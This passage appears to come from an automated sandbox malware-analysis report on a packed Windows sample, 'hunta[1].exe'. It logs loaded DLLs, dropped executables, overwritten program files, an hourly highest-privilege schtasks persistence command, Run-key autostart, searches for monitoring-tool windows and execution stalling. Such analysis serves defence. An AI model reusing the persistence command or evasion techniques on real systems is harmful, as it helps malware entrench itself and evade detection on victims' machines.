            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winmm.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wininet.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: devobj.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winmm.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wininet.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: devobj.dll
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: hunta[1].exeStatic file information: File size 2383872 > 1048576
            Source: hunta[1].exeStatic PE information: Raw size of gpsaqaiu is bigger than: 0x100000 < 0x1ad600
            Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.4.dr

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\hunta[1].exeUnpacked PE file: 2.2.hunta[1].exe.e80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW;
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeUnpacked PE file: 4.2.WwKLWFk.exe.210000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeUnpacked PE file: 14.2.MPGPH131.exe.300000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW;
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeUnpacked PE file: 15.2.MPGPH131.exe.300000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW;
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeUnpacked PE file: 21.2.RageMP131.exe.270000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW;
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeUnpacked PE file: 22.2.WwKLWFk.exe.b50000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeUnpacked PE file: 24.2.RageMP131.exe.270000.0.unpack :EW;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW; vs :ER;.rsrc:W;.idata :W; :EW;gpsaqaiu:EW;zlufpcnd:EW;.taggant:EW;u:EW;
            Source: initial sampleStatic PE information: section where entry point is pointing to: u
            Source: hunta[1].exeStatic PE information: section name:
            Source: hunta[1].exeStatic PE information: section name: .idata
            Source: hunta[1].exeStatic PE information: section name:
            Source: hunta[1].exeStatic PE information: section name: gpsaqaiu
            Source: hunta[1].exeStatic PE information: section name: zlufpcnd
            Source: hunta[1].exeStatic PE information: section name: .taggant
            Source: hunta[1].exeStatic PE information: section name: u
            Source: RageMP131.exe.2.drStatic PE information: section name:
            Source: RageMP131.exe.2.drStatic PE information: section name: .idata
            Source: RageMP131.exe.2.drStatic PE information: section name:
            Source: RageMP131.exe.2.drStatic PE information: section name: gpsaqaiu
            Source: RageMP131.exe.2.drStatic PE information: section name: zlufpcnd
            Source: RageMP131.exe.2.drStatic PE information: section name: .taggant
            Source: RageMP131.exe.2.drStatic PE information: section name: u
            Source: MPGPH131.exe.2.drStatic PE information: section name:
            Source: MPGPH131.exe.2.drStatic PE information: section name: .idata
            Source: MPGPH131.exe.2.drStatic PE information: section name:
            Source: MPGPH131.exe.2.drStatic PE information: section name: gpsaqaiu
            Source: MPGPH131.exe.2.drStatic PE information: section name: zlufpcnd
            Source: MPGPH131.exe.2.drStatic PE information: section name: .taggant
            Source: MPGPH131.exe.2.drStatic PE information: section name: u
            Source: WwKLWFk.exe.2.drStatic PE information: section name: .aspack
            Source: WwKLWFk.exe.2.drStatic PE information: section name: .adata
            Source: MyProg.exe.4.drStatic PE information: section name: PELIB
            Source: MyProg.exe.4.drStatic PE information: section name: Y|uR
            Source: SciTE.exe.4.drStatic PE information: section name: u
            Source: Uninstall.exe.4.drStatic PE information: section name: EpNuZ
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_00F5D157 push ecx; ret 2_2_00F5D16A
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 4_2_00211638 push dword ptr [00213084h]; ret 4_2_0021170E
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 4_2_0021600A push ebp; ret 4_2_0021600D
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 4_2_00216014 push 002114E1h; ret 4_2_00216425
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 4_2_00212D9B push ecx; ret 4_2_00212DAB
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 14_2_003DD157 push ecx; ret 14_2_003DD16A
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 15_2_003DD157 push ecx; ret 15_2_003DD16A
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 21_2_0034D157 push ecx; ret 21_2_0034D16A
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 22_2_00B51638 push dword ptr [00B53084h]; ret 22_2_00B5170E
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 22_2_00B56014 push 00B514E1h; ret 22_2_00B56425
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 22_2_00B52D9B push ecx; ret 22_2_00B52DAB
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 22_2_00B5600A push ebp; ret 22_2_00B5600D
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 24_2_0034D157 push ecx; ret 24_2_0034D16A
            Source: hunta[1].exeStatic PE information: section name: entropy: 7.9863529700778955
            Source: hunta[1].exeStatic PE information: section name: gpsaqaiu entropy: 7.9114235300996505
            Source: hunta[1].exeStatic PE information: section name: u entropy: 6.9350665765420185
            Source: RageMP131.exe.2.drStatic PE information: section name: entropy: 7.9863529700778955
            Source: RageMP131.exe.2.drStatic PE information: section name: gpsaqaiu entropy: 7.9114235300996505
            Source: RageMP131.exe.2.drStatic PE information: section name: u entropy: 6.9350665765420185
            Source: MPGPH131.exe.2.drStatic PE information: section name: entropy: 7.9863529700778955
            Source: MPGPH131.exe.2.drStatic PE information: section name: gpsaqaiu entropy: 7.9114235300996505
            Source: MPGPH131.exe.2.drStatic PE information: section name: u entropy: 6.9350665765420185
            Source: WwKLWFk.exe.2.drStatic PE information: section name: .text entropy: 7.81169422100848
            Source: MyProg.exe.4.drStatic PE information: section name: Y|uR entropy: 6.933467573803484
            Source: SciTE.exe.4.drStatic PE information: section name: u entropy: 6.934542386941867
            Source: Uninstall.exe.4.drStatic PE information: section name: EpNuZ entropy: 6.934080518099734

            Persistence and Installation Behavior

            barindex
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
            Source: C:\Users\user\Desktop\hunta[1].exeFile created: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
            Source: C:\Users\user\Desktop\hunta[1].exeFile created: C:\ProgramData\MPGPH131\MPGPH131.exeJump to dropped file
            Source: C:\Users\user\Desktop\hunta[1].exeFile created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
            Source: C:\Users\user\Desktop\hunta[1].exeFile created: C:\ProgramData\MPGPH131\MPGPH131.exeJump to dropped file

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\hunta[1].exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonClass
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASS
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: RegmonClass
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonClass
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASS
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: Regmonclass
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: Filemonclass
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASS
            Source: C:\Users\user\Desktop\hunta[1].exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
            Source: C:\Users\user\Desktop\hunta[1].exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131Jump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131Jump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 799
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeStalling execution: Execution stalls by calling Sleepgraph_21-23073
